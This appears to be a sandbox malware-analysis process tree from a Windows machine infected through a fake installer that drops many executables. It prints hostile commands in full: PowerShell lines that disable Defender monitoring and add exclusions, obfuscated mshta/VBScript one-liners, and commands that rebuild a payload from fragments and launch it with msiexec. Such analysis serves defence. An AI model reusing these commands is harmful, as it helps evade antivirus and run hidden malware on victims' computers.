C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\trfbdigC:\Users\Admin\AppData\Roaming\trfbdig2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig3⤵
-
C:\Users\Admin\AppData\Roaming\dcfbdigC:\Users\Admin\AppData\Roaming\dcfbdig2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Enumerates connected drives
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\ha.exe"C:\Users\Admin\AppData\Local\Temp\ha.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect64.exe"C:\Users\Admin\Desktop\CrowdInspect64.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Новый текстовый документ.txt1⤵
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14f1396dfcf191bd.exeSat14f1396dfcf191bd.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5025751.exe"C:\Users\Admin\AppData\Roaming\5025751.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7536159.exe"C:\Users\Admin\AppData\Roaming\7536159.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7536159.exe"C:\Users\Admin\AppData\Roaming\7536159.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\7477494.exe"C:\Users\Admin\AppData\Roaming\7477494.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3340470.exe"C:\Users\Admin\AppData\Roaming\3340470.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7977000.exe"C:\Users\Admin\AppData\Roaming\7977000.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exeSat142b09ae40c44cf.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXEJyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+ 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk>1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 +lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF710⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y .\2KSA.GF711⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Sat142b09ae40c44cf.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14d32a38896785b13.exeSat14d32a38896785b13.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\1104282.exe"C:\ProgramData\1104282.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\7432933.exe"C:\ProgramData\7432933.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\ProgramData\7432933.exe"C:\ProgramData\7432933.exe"9⤵
-
C:\ProgramData\7432933.exe"C:\ProgramData\7432933.exe"9⤵
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\7403546.exe"C:\ProgramData\7403546.exe"8⤵
-
C:\ProgramData\7063847.exe"C:\ProgramData\7063847.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\ProgramData\7063847.exe"C:\ProgramData\7063847.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT( "wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8128⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8888⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9088⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9568⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 10128⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ffb789adec0,0x7ffb789aded0,0x7ffb789adee010⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff7d98a9e70,0x7ff7d98a9e80,0x7ff7d98a9e9011⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1536 /prefetch:210⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=1936 /prefetch:810⤵
- Loads dropped DLL
-
